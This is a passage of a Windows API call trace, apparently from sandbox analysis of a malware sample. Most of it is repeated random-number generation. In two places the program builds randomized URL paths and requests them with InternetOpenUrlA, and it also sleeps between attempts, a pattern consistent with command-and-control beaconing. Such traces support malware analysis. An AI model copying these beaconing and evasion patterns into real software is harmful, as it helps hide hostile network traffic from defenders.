hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.272] GetProcessHeap () returned 0x440000 [0186.272] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0186.272] lstrcpyA (in: lpString1=0x473b90, lpString2="ðXO" | out: lpString1="ðXO") returned="ðXO" [0186.272] lstrcatA (in: lpString1="ðXO", lpString2="/oe461Eo6H5fecCoxYdfbcYkhhmntHf5n15bahnkk0lnvmU/" | out: lpString1="ðXO/oe461Eo6H5fecCoxYdfbcYkhhmntHf5n15bahnkk0lnvmU/") returned="ðXO/oe461Eo6H5fecCoxYdfbcYkhhmntHf5n15bahnkk0lnvmU/" [0186.272] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0186.272] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="ðXO/oe461Eo6H5fecCoxYdfbcYkhhmntHf5n15bahnkk0lnvmU/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0186.272] GetProcessHeap () returned 0x440000 [0186.272] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0186.272] GetProcessHeap () returned 0x440000 [0186.272] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f58f0 | out: hHeap=0x440000) returned 1 [0186.273] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0186.273] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0186.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0186.273] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0186.273] Sleep (dwMilliseconds=0x1a9d9) [0186.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0186.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.597] GetProcessHeap () returned 0x440000 [0186.597] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17fc0 [0186.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17fc1, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a17fc1) returned 0x0 [0186.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17fdb, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x3a17fdb) returned 0x0 [0186.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0186.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0186.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1800c, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a1800c) returned 0x0 [0186.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0186.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0186.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0186.615] GetProcessHeap () returned 0x440000 [0186.615] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473350 [0186.615] lstrcpyA (in: lpString1=0x473350, lpString2="À\x7f¡\x03" | out: lpString1="À\x7f¡\x03") returned="À\x7f¡\x03" [0186.615] lstrcatA (in: lpString1="À\x7f¡\x03", lpString2="/xnlns9QGc5E3p6U4p0p1la069/y8qbld6xtgi341yy08lz0zDsdbtayaeQswq6yfdcw3j8XGu1/U7535nslp9aPTC6sbe/" | out: lpString1="À\x7f¡\x03/xnlns9QGc5E3p6U4p0p1la069/y8qbld6xtgi341yy08lz0zDsdbtayaeQswq6yfdcw3j8XGu1/U7535nslp9aPTC6sbe/") returned="À\x7f¡\x03/xnlns9QGc5E3p6U4p0p1la069/y8qbld6xtgi341yy08lz0zDsdbtayaeQswq6yfdcw3j8XGu1/U7535nslp9aPTC6sbe/" [0186.615] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0186.615] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="À\x7f¡\x03/xnlns9QGc5E3p6U4p0p1la069/y8qbld6xtgi341yy08lz0zDsdbtayaeQswq6yfdcw3j8XGu1/U7535nslp9aPTC6sbe/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0186.615] GetProcessHeap () returned 0x440000 [0186.615] HeapFree (in: hHeap=0x440000, 